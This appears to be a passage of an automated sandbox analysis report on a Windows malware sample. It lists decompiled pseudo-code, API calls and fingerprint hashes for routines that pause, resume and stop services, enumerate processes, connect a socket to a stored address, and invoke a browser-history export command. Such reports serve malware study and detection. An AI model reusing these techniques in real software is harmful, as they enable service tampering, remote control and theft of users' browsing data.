                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401A68
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401A80
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401A90
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401A9F
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                    • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                    • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                    • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                    • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                    • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                    • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                    • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                    • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                  • String ID:
                                  • API String ID: 573486607-0
                                  • Opcode ID: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                  • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                  • Opcode Fuzzy Hash: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                  • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                   			E00411859(void* _a4) {
                                   				// Pauses the named service (_a4 is the std::wstring service name).
                                   				struct _SERVICE_STATUS _v32;
                                   				short* _t6;
                                   				signed int _t14;
                                   				void* _t17;
                                   				void* _t18;
                                   
                                   				_t14 = 0;
                                   				_t6 = OpenSCManagerW(0, 0, 0x40);  // 0x40 is not an SC_MANAGER_* right; it is the SERVICE_PAUSE_CONTINUE mask used again below
                                   				_t18 = _t6;
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                   				_t17 = OpenServiceW(_t18, _t6, 0x40);  // 0x40 = SERVICE_PAUSE_CONTINUE
                                   				if(_t17 != 0) {
                                   					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;  // 2 = SERVICE_CONTROL_PAUSE
                                   					CloseServiceHandle(_t18);
                                   					CloseServiceHandle(_t17);
                                   				} else {
                                   					CloseServiceHandle(_t18);
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                   				return _t14;  // nonzero when ControlService succeeded
                                   			}








                                   Listing addresses: 0x00411862 to 0x004118bf

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                   			E004118C0(void* _a4) {
                                   				// Resumes (continues) the named service; same structure as E00411859 with a different control code.
                                   				struct _SERVICE_STATUS _v32;
                                   				short* _t6;
                                   				signed int _t14;
                                   				void* _t17;
                                   				void* _t18;
                                   
                                   				_t14 = 0;
                                   				_t6 = OpenSCManagerW(0, 0, 0x40);  // 0x40 is not an SC_MANAGER_* right; it is the SERVICE_PAUSE_CONTINUE mask used again below
                                   				_t18 = _t6;
                                   				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                   				_t17 = OpenServiceW(_t18, _t6, 0x40);  // 0x40 = SERVICE_PAUSE_CONTINUE
                                   				if(_t17 != 0) {
                                   					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;  // 3 = SERVICE_CONTROL_CONTINUE
                                   					CloseServiceHandle(_t18);
                                   					CloseServiceHandle(_t17);
                                   				} else {
                                   					CloseServiceHandle(_t18);
                                   				}
                                   				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                   				return _t14;  // nonzero when ControlService succeeded
                                   			}








                                   Listing addresses: 0x004118c9 to 0x00411926

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00411760(void* _a4) {
                                  				struct _SERVICE_STATUS _v32;
                                  				short* _t6;
                                  				signed int _t14;
                                  				void* _t17;
                                  				void* _t18;
                                  
                                  				_t14 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 0x20);
                                  				_t18 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t17 = OpenServiceW(_t18, _t6, 0x20);
                                  				if(_t17 != 0) {
                                  					_t14 = 0 | ControlService(_t17, 1,  &_v32) != 0x00000000;
                                  					CloseServiceHandle(_t18);
                                  					CloseServiceHandle(_t17);
                                  				} else {
                                  					CloseServiceHandle(_t18);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t14;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,00411280), ref: 0041176F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000020,?,?,?,?,?,?,?,00411280), ref: 0041177C
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411280), ref: 00411784
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 00411791
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,00411280), ref: 004117A0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B2
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411280), ref: 004117B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411280), ref: 004117BA
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: b89de82e4dcd107d12e5f2e386de490b738cfb46e6195f9b9e1884d6b0831d1c
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 23F0AF71100618EFD3106FB4AC88EFF3F6CEF89390B044025FA06921A0DB648D468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 43%
                                  			E0040D761(void* __ecx, void* __eflags) {
                                  				void* _t15;
                                  				void* _t20;
                                  				void* _t30;
                                  				void* _t32;
                                  				void* _t34;
                                  				void* _t38;
                                  
                                  				_t38 = __eflags;
                                  				_t20 = __ecx;
                                  				__imp___itoa(GetCurrentProcessId(), _t32 - 0x30, 0xa);
                                  				_t15 = _t32 - 0x60;
                                  				L00414140();
                                  				L00414170();
                                  				E004020C2(0x41be70, 0x4f, _t34);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t15, _t15, E00409EAA(_t38, _t32 - 0x150), _t30, _t32 - 0x30, _t20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				E004017DD(_t32 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,0000000A), ref: 0040D767
                                  • _itoa.MSVCRT ref: 0040D76E
                                    • Part of subcall function 00409EAA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00409EAA: CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                    • Part of subcall function 00409EAA: Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                    • Part of subcall function 00409EAA: Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                    • Part of subcall function 00409EAA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409F99
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FA9
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4,00000000,00000002,00000000), ref: 00409FB6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004166F4,00000000,004166F4,00000000,004166F4), ref: 00409FC6
                                    • Part of subcall function 00409EAA: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004166F4,00000000), ref: 00409FD3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?), ref: 0040D78E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040D798
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004F), ref: 0040D7AF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@0@D@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@0@$??0?$basic_string@V10@$Process32$CreateCurrentD@1@@FirstG@1@@G@2@@std@@G@std@@NextProcessSnapshotToolhelp32V01@@_itoa
                                  • String ID:
                                  • API String ID: 1707565870-0
                                  • Opcode ID: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                  • Instruction ID: 286f1569ef994b2bf272d8202e8d00d479d3e157814ab9f0be6f7aa08cfd563f
                                  • Opcode Fuzzy Hash: df7207b37aa3fc83145d442fa6c541f7260c2bf86f695acf5d840247295bf7f5
                                  • Instruction Fuzzy Hash: CD01217291021CEBCB05ABE1EC4DDEE7738FBA4306F00443AF506A7091EB745949CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 24%
                                  			E00410E53(void* __eflags, char _a4) {
                                  				char _v20;
                                  				char _v36;
                                  				char _v52;
                                  				void* _t16;
                                  				char* _t18;
                                  				void* _t19;
                                  				void* _t36;
                                  
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                  				E00402038(0x41c130);
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				asm("movsd");
                                  				E0040209B(0x41c130,  &_a4);
                                  				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
                                  				_t18 =  &_v20;
                                  				L00414140();
                                  				L00414140();
                                  				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4, 0x41b310, _t16, 0x41c130);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				E00402118(0x41c130, E00410F04);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t19;
                                  			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                    • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,?,?,00000000,?), ref: 00410EB0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                  • String ID:
                                  • API String ID: 2339118965-0
                                  • Opcode ID: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                  • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                  • Opcode Fuzzy Hash: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                  • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 43%
                                  			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                  				char _v20;
                                  				void* _t15;
                                  				void* _t18;
                                  				signed int _t20;
                                  				void* _t25;
                                  				signed int _t28;
                                  				signed int _t29;
                                  				signed int _t36;
                                  				void* _t46;
                                  				signed int _t57;
                                  				void* _t58;
                                  
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t57 = __eax + 2;
                                  				_t15 = _t57 + _t57;
                                  				L00413E84();
                                  				_t25 = _t15;
                                  				_t28 = _t57;
                                  				_t46 = _t25;
                                  				_t29 = _t28 >> 2;
                                  				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
                                  				_t6 = _t57 - 2; // 0x0
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                  				_t58 = _t18;
                                  				_t36 = _t6 >> 2;
                                  				_t20 = memcpy(_t25, _t58, _t36 << 2);
                                  				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
                                  				L00413EBE();
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _a4;
